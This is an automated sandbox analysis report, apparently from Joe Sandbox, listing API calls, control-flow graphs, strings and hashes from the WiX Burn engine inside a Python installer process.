                                                                                                                                    • Part of subcall function 00481206: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,004852B7,00000000,?), ref: 00481244
                                                                                                                                    • Part of subcall function 00481206: GetLastError.KERNEL32(?,?,?,004852B7,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0048124E
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 004852FD
                                                                                                                                    • Part of subcall function 004C12D3: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 004C12F4
                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 0048538F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00485399
                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00485606
                                                                                                                                  Strings
                                                                                                                                  • Failed to initialize COM., xrefs: 00485309
                                                                                                                                  • Failed to parse command line., xrefs: 004852BD
                                                                                                                                  • Failed to run per-machine mode., xrefs: 004854E4
                                                                                                                                  • Failed to run per-user mode., xrefs: 0048550C
                                                                                                                                  • Failed to initialize Cryputil., xrefs: 0048531E
                                                                                                                                  • Invalid run mode., xrefs: 00485471
                                                                                                                                  • Failed to initialize Wiutil., xrefs: 00485359
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engine.cpp, xrefs: 004853BD
                                                                                                                                  • Failed to run embedded mode., xrefs: 004854BC
                                                                                                                                  • Failed to initialize engine state., xrefs: 004852E4
                                                                                                                                  • Failed to get OS info., xrefs: 004853C7
                                                                                                                                  • Failed to initialize XML util., xrefs: 00485371
                                                                                                                                  • Failed to initialize core., xrefs: 0048543B
                                                                                                                                  • 3.14.0.5722, xrefs: 004853FC
                                                                                                                                  • Failed to run RunOnce mode., xrefs: 00485494
                                                                                                                                  • Failed to initialize Regutil., xrefs: 00485341
                                                                                                                                  • Failed to run untrusted mode., xrefs: 0048552E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                  • String ID: 3.14.0.5722$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$c:\agent\_work\138\s\src\burn\engine\engine.cpp
                                                                                                                                  • API String ID: 3262001429-872186229
                                                                                                                                  • Opcode ID: a5e088c317e75d8bff6fae3d41132aaaaaa10cb785f4c5c78807c11b1ab2c2af
                                                                                                                                  • Instruction ID: c8f6205aac4531361840de02aa55a9e3950c5e0a4e8f11883d1544171815fea6
                                                                                                                                  • Opcode Fuzzy Hash: a5e088c317e75d8bff6fae3d41132aaaaaa10cb785f4c5c78807c11b1ab2c2af
                                                                                                                                  • Instruction Fuzzy Hash: 68B1D571D41A29ABDB21BF658C46BEE76B4AB04705F0005EFF908B6241DB789E408F9D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1408 4c34d0-4c34f4 GetModuleHandleA 1409 4c3529-4c353a GetProcAddress 1408->1409 1410 4c34f6-4c3500 GetLastError 1408->1410 1413 4c353c-4c3560 GetProcAddress * 3 1409->1413 1414 4c357d 1409->1414 1411 4c350d 1410->1411 1412 4c3502-4c350b 1410->1412 1416 4c350f 1411->1416 1417 4c3514-4c3524 call 4838f5 1411->1417 1412->1411 1418 4c3579-4c357b 1413->1418 1419 4c3562-4c3564 1413->1419 1415 4c357f-4c359c CoCreateInstance 1414->1415 1420 4c3632-4c3634 1415->1420 1421 4c35a2-4c35a4 1415->1421 1416->1417 1431 4c3648-4c364d 1417->1431 1418->1415 1419->1418 1423 4c3566-4c3568 1419->1423 1425 4c3636-4c363d 1420->1425 1426 4c3647 1420->1426 1424 4c35a9-4c35b9 1421->1424 1423->1418 1428 4c356a-4c3577 1423->1428 1429 4c35bb-4c35bf 1424->1429 1430 4c35c3 1424->1430 1425->1426 1439 4c363f-4c3641 ExitProcess 1425->1439 1426->1431 1428->1415 1429->1424 1432 4c35c1 1429->1432 1434 4c35c5-4c35d5 1430->1434 1435 4c364f-4c3651 1431->1435 1436 4c3655-4c365a 1431->1436 1438 4c35dd 1432->1438 1440 4c35e7-4c35eb 1434->1440 1441 4c35d7-4c35db 1434->1441 1435->1436 1442 4c365c-4c365e 1436->1442 1443 4c3662-4c3667 1436->1443 1438->1440 1444 4c35ed-4c3600 call 4c366a 1440->1444 1445 4c3616-4c3627 1440->1445 1441->1434 1441->1438 1442->1443 1444->1420 1450 4c3602-4c3614 1444->1450 1445->1420 1447 4c3629-4c3630 1445->1447 1447->1420 1450->1420 1450->1445
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,004C3A7E,00000000,?,00000000), ref: 004C34EA
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004ABE27,?,?,?,00000000,?), ref: 004C34F6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004C3536
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004C3542
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 004C354D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004C3557
                                                                                                                                  • CoCreateInstance.OLE32(004EC7A0,00000000,00000001,004CB878,?,?,?,?,?,?,?,?,?,?,?,004ABE27), ref: 004C3592
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004C3641
                                                                                                                                  Strings
                                                                                                                                  • IsWow64Process, xrefs: 004C3530
                                                                                                                                  • Wow64EnableWow64FsRedirection, xrefs: 004C3544
                                                                                                                                  • Wow64RevertWow64FsRedirection, xrefs: 004C354F
                                                                                                                                  • kernel32.dll, xrefs: 004C34DA
                                                                                                                                  • Wow64DisableWow64FsRedirection, xrefs: 004C353C
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp, xrefs: 004C351A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp$kernel32.dll
                                                                                                                                  • API String ID: 2124981135-566418578
                                                                                                                                  • Opcode ID: d5274bbfbd6f4469beff5ba816ecd0623fd61ae10c7ce4a67d79ec08a34b65d3
                                                                                                                                  • Instruction ID: d8fd6793dc19c865ae0201735d79a78ed747e7017dbbaf5f0bf83b18f979c240
                                                                                                                                  • Opcode Fuzzy Hash: d5274bbfbd6f4469beff5ba816ecd0623fd61ae10c7ce4a67d79ec08a34b65d3
                                                                                                                                  • Instruction Fuzzy Hash: 3E41B039B00215BBCB609FA9C895F6EB7A4EF04752F11846EE901EB340D779DE018B98
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004834EF: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,004810DD,?,00000000), ref: 00483510
                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 004810F6
                                                                                                                                    • Part of subcall function 00481173: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 00481184
                                                                                                                                    • Part of subcall function 00481173: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 0048118F
                                                                                                                                    • Part of subcall function 00481173: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0048119D
                                                                                                                                    • Part of subcall function 00481173: GetLastError.KERNEL32(?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 004811B8
                                                                                                                                    • Part of subcall function 00481173: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004811C0
                                                                                                                                    • Part of subcall function 00481173: GetLastError.KERNEL32(?,?,?,?,?,0048111A,cabinet.dll,00000009,?,?,00000000), ref: 004811D5
                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,004CB4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00481131
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                  • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                  • API String ID: 3687706282-3151496603
                                                                                                                                  • Opcode ID: b8848969d9d31f0f1dcec831882af756785636e410022643a3f4ec725ab23e53
                                                                                                                                  • Instruction ID: 6e2ae0fa3eeb14750fdd410b4fbe37387045d75358c9c70c941a89cc717be2fe
                                                                                                                                  • Opcode Fuzzy Hash: b8848969d9d31f0f1dcec831882af756785636e410022643a3f4ec725ab23e53
                                                                                                                                  • Instruction Fuzzy Hash: 4A219475D00218ABCB40AFA5CC0AFDFBBBCEB09719F10851BE911B7291D77859058BAC
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(004EC6EC,00000000,?,?,?,?,004A1188,8007139F,Invalid operation for this state.,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7,8007139F), ref: 004C030B
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,004A1188,8007139F,Invalid operation for this state.,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7,8007139F), ref: 004C031B
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004C0324
                                                                                                                                  • GetLocalTime.KERNEL32(8007139F,?,004A1188,8007139F,Invalid operation for this state.,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7,8007139F), ref: 004C033A
                                                                                                                                  • LeaveCriticalSection.KERNEL32(004EC6EC,004A1188,?,00000000,0000FDE9,?,004A1188,8007139F,Invalid operation for this state.,c:\agent\_work\138\s\src\burn\engine\cabextract.cpp,000001C7,8007139F), ref: 004C0431
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$PlN$TlN$XlN$\lN
                                                                                                                                  • API String ID: 296830338-1771312383
                                                                                                                                  • Opcode ID: 1080408e4067bfed1620a16a6840fd06c50232e4622a847f2f5b49ea72e1a52b
                                                                                                                                  • Instruction ID: 32df67fd1d5a414a75a8c902a73ec72b5f792ecb7c5b285d82d8c24c1754d559
                                                                                                                                  • Opcode Fuzzy Hash: 1080408e4067bfed1620a16a6840fd06c50232e4622a847f2f5b49ea72e1a52b
                                                                                                                                  • Instruction Fuzzy Hash: DF418E35A00259EBCB519FA9CC85FBF76B9EB08745F10412BFA00E6260D73C9D41CBA9
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,004B4502,00000000,80004004,?,00000000,?,004B1731), ref: 004B4525
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,004B4502,00000000,80004004,?,00000000,?,004B1731), ref: 004B452C
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004B453E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 13f580b65de22dfcc25df31469ced9670493a42a8678507ea54057b5f7afc88a
                                                                                                                                  • Instruction ID: 7b5f882c10ab312552495c03e99387c181a27538ab1fbd654dfa7ae9d7073d49
                                                                                                                                  • Opcode Fuzzy Hash: 13f580b65de22dfcc25df31469ced9670493a42a8678507ea54057b5f7afc88a
                                                                                                                                  • Instruction Fuzzy Hash: D7E0BF31441948BFCB616B55DC0DD993B69EB80381F444465F60686132CB39DD42CB99
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0048E0EE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0048E7D2
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  Strings
                                                                                                                                  • Failed to find backward transaction boundary: %ls, xrefs: 0048E5B3
                                                                                                                                  • Failed to parse MSU package., xrefs: 0048E5D1
                                                                                                                                  • wininet.dll, xrefs: 0048E2F0
                                                                                                                                  • InstallCondition, xrefs: 0048E352
                                                                                                                                  • Failed to parse MSI package., xrefs: 0048E457
                                                                                                                                  • cabinet.dll, xrefs: 0048E294
                                                                                                                                  • Permanent, xrefs: 0048E2CB
                                                                                                                                  • Failed to get @CacheId., xrefs: 0048E777
                                                                                                                                  • yes, xrefs: 0048E21D
                                                                                                                                  • Failed to select package nodes., xrefs: 0048E12A
                                                                                                                                  • comres.dll, xrefs: 0048E2CA
                                                                                                                                  • msi.dll, xrefs: 0048E25E
                                                                                                                                  • Failed to get @RollbackBoundaryBackward., xrefs: 0048E5BD
                                                                                                                                  • RollbackBoundaryForward, xrefs: 0048E375
                                                                                                                                  • Failed to parse EXE package., xrefs: 0048E41F
                                                                                                                                  • Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0048E117
                                                                                                                                  • Failed to get @Permanent., xrefs: 0048E75B
                                                                                                                                  • Failed to parse target product codes., xrefs: 0048E737
                                                                                                                                  • Failed to get @LogPathVariable., xrefs: 0048E57B
                                                                                                                                  • RollbackBoundary, xrefs: 0048DFEC
                                                                                                                                  • Size, xrefs: 0048E27A
                                                                                                                                  • Failed to get @PerMachine., xrefs: 0048E762
                                                                                                                                  • CacheId, xrefs: 0048E25F
                                                                                                                                  • Failed to get @Cache., xrefs: 0048E796
                                                                                                                                  • Failed to allocate memory for MSP patch sequence information., xrefs: 0048E571
                                                                                                                                  • PerMachine, xrefs: 0048E2B0
                                                                                                                                  • always, xrefs: 0048E23D
                                                                                                                                  • MsuPackage, xrefs: 0048E49C
                                                                                                                                  • Failed to get @InstallCondition., xrefs: 0048E58F
                                                                                                                                  • MspPackage, xrefs: 0048E463
                                                                                                                                  • Failed to get @InstallSize., xrefs: 0048E769
                                                                                                                                  • Failed to parse payload references., xrefs: 0048E74D
                                                                                                                                  • clbcatq.dll, xrefs: 0048E2AF
                                                                                                                                  • Failed to allocate memory for rollback boundary structs., xrefs: 0048E060
                                                                                                                                  • Cache, xrefs: 0048E1E1
                                                                                                                                  • RollbackBoundaryBackward, xrefs: 0048E3AF
                                                                                                                                  • Failed to allocate memory for package structs., xrefs: 0048E185
                                                                                                                                  • Failed to find forward transaction boundary: %ls, xrefs: 0048E59C
                                                                                                                                  • LogPathVariable, xrefs: 0048E30C
                                                                                                                                  • Failed to select rollback boundary nodes., xrefs: 0048DFFF
                                                                                                                                  • RollbackLogPathVariable, xrefs: 0048E32F
                                                                                                                                  • Failed to get @Id., xrefs: 0048E79D
                                                                                                                                  • crypt32.dll, xrefs: 0048E351
                                                                                                                                  • feclient.dll, xrefs: 0048E32E
                                                                                                                                  • Failed to allocate memory for patch sequence information to package lookup., xrefs: 0048E606
                                                                                                                                  • Failed to get @RollbackBoundaryForward., xrefs: 0048E5A6
                                                                                                                                  • Failed to parse MSP package., xrefs: 0048E5C7
                                                                                                                                  • Failed to get package node count., xrefs: 0048E147
                                                                                                                                  • Failed to get @Size., xrefs: 0048E770
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\package.cpp, xrefs: 0048E054, 0048E179, 0048E565, 0048E5FA
                                                                                                                                  • Vital, xrefs: 0048E0BD, 0048E2F1
                                                                                                                                  • Failed to get rollback bundary node count., xrefs: 0048E024
                                                                                                                                  • Invalid cache type: %ls, xrefs: 0048E786
                                                                                                                                  • InstallSize, xrefs: 0048E295
                                                                                                                                  • Failed to get @Vital., xrefs: 0048E754
                                                                                                                                  • Failed to get next node., xrefs: 0048E7A4
                                                                                                                                  • ExePackage, xrefs: 0048E3ED
                                                                                                                                  • Failed to parse dependency providers., xrefs: 0048E746
                                                                                                                                  • Failed to get @RollbackLogPathVariable., xrefs: 0048E585
                                                                                                                                  • MsiPackage, xrefs: 0048E42B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapString$AllocateProcess
                                                                                                                                  • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$c:\agent\_work\138\s\src\burn\engine\package.cpp$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$wininet.dll$yes
                                                                                                                                  • API String ID: 336948655-2579067069
                                                                                                                                  • Opcode ID: 89a10a738dde6edfc65e53dab4f99266959adc0296bc35fd9d784702fdf13663
                                                                                                                                  • Instruction ID: c080f857bfb61336627a3af1c4e069016a0467cab3d3deade1aeb69ab2171872
                                                                                                                                  • Opcode Fuzzy Hash: 89a10a738dde6edfc65e53dab4f99266959adc0296bc35fd9d784702fdf13663
                                                                                                                                  • Instruction Fuzzy Hash: 9B32D371900226FBDB11AF56CC51FAEB6B4AF04724F204A6BF910BB391D778DD019B98

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 220 48fa6e-48fa9f call 4c3e1c 223 48faa1 220->223 224 48faa3-48faa5 220->224 223->224 225 48fab9-48fad2 call 4c3770 224->225 226 48faa7-48fab4 call 4c0657 224->226 232 48fade-48faf3 call 4c3770 225->232 233 48fad4-48fad9 225->233 231 48ffa1-48ffa6 226->231 234 48ffa8-48ffaa 231->234 235 48ffae-48ffb3 231->235 245 48faff-48fb0c call 48eae9 232->245 246 48faf5-48fafa 232->246 236 48ff98-48ff9f call 4c0657 233->236 234->235 239 48ffbb-48ffc0 235->239 240 48ffb5-48ffb7 235->240 248 48ffa0 236->248 243 48ffc8-48ffcc 239->243 244 48ffc2-48ffc4 239->244 240->239 249 48ffce-48ffd1 call 48278d 243->249 250 48ffd6-48ffdb 243->250 244->243 253 48fb18-48fb2d call 4c3770 245->253 254 48fb0e-48fb13 245->254 246->236 248->231 249->250 257 48fb39-48fb4b call 4c50cb 253->257 258 48fb2f-48fb34 253->258 254->236 261 48fb5a-48fb6f call 4c3770 257->261 262 48fb4d-48fb55 257->262 258->236 268 48fb7b-48fb90 call 4c3770 261->268 269 48fb71-48fb76 261->269 263 48fe24-48fe2d call 4c0657 262->263 263->248 272 48fb9c-48fbae call 4c397c 268->272 273 48fb92-48fb97 268->273 269->236 276 48fbba-48fbd0 call 4c3e1c 272->276 277 48fbb0-48fbb5 272->277 273->236 280 48fe7f-48fe99 call 48ed63 276->280 281 48fbd6-48fbd8 276->281 277->236 287 48fe9b-48fea0 280->287 288 48fea5-48febd call 4c3e1c 280->288 282 48fbda-48fbdf 281->282 283 48fbe4-48fbf9 call 4c397c 281->283 282->236 290 48fbfb-48fc00 283->290 291 48fc05-48fc1a call 4c3770 283->291 287->236 296 48fec3-48fec5 288->296 297 48ff87-48ff88 call 48f193 288->297 290->236 298 48fc2a-48fc3f call 4c3770 291->298 299 48fc1c-48fc1e 291->299 300 48fed1-48feef call 4c3770 296->300 301 48fec7-48fecc 296->301 306 48ff8d-48ff91 297->306 310 48fc4f-48fc64 call 4c3770 298->310 311 48fc41-48fc43 298->311 299->298 303 48fc20-48fc25 299->303 312 48fefb-48ff13 call 4c3770 300->312 313 48fef1-48fef6 300->313 301->236 303->236 306->248 309 48ff93 306->309 309->236 321 48fc74-48fc89 call 4c3770 310->321 322 48fc66-48fc68 310->322 311->310 314 48fc45-48fc4a 311->314 319 48ff20-48ff38 call 4c3770 312->319 320 48ff15-48ff17 312->320 313->236 314->236 329 48ff3a-48ff3c 319->329 330 48ff45-48ff5d call 4c3770 319->330 320->319 325 48ff19-48ff1e 320->325 331 48fc99-48fcae call 4c3770 321->331 332 48fc8b-48fc8d 321->332 322->321 326 48fc6a-48fc6f 322->326 325->236 326->236 329->330 333 48ff3e-48ff43 329->333 339 48ff5f-48ff64 330->339 340 48ff66-48ff7e call 4c3770 330->340 341 48fcbe-48fcd3 call 4c3770 331->341 342 48fcb0-48fcb2 331->342 332->331 334 48fc8f-48fc94 332->334 333->236 334->236 339->236 340->297 348 48ff80-48ff85 340->348 349 48fce3-48fcf8 call 4c3770 341->349 350 48fcd5-48fcd7 341->350 342->341 344 48fcb4-48fcb9 342->344 344->236 348->236 354 48fd08-48fd1d call 4c3770 349->354 355 48fcfa-48fcfc 349->355 350->349 352 48fcd9-48fcde 350->352 352->236 359 48fd2d-48fd45 call 4c3770 354->359 360 48fd1f-48fd21 354->360 355->354 356 48fcfe-48fd03 355->356 356->236 364 48fd55-48fd6d call 4c3770 359->364 365 48fd47-48fd49 359->365 360->359 361 48fd23-48fd28 360->361 361->236 369 48fd7d-48fd92 call 4c3770 364->369 370 48fd6f-48fd71 364->370 365->364 366 48fd4b-48fd50 365->366 366->236 374 48fd98-48fdb5 CompareStringW 369->374 375 48fe32-48fe34 369->375 370->369 371 48fd73-48fd78 370->371 371->236 378 48fdbf-48fdd4 CompareStringW 374->378 379 48fdb7-48fdbd 374->379 376 48fe3f-48fe41 375->376 377 48fe36-48fe3d 375->377 380 48fe4d-48fe65 call 4c397c 376->380 381 48fe43-48fe48 376->381 377->376 383 48fde2-48fdf7 CompareStringW 378->383 384 48fdd6-48fde0 378->384 382 48fe00-48fe05 379->382 380->280 390 48fe67-48fe69 380->390 381->236 382->376 386 48fdf9 383->386 387 48fe07-48fe1f call 4838f5 383->387 384->382 386->382 387->263 392 48fe6b-48fe70 390->392 393 48fe75 390->393 392->236 393->280
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
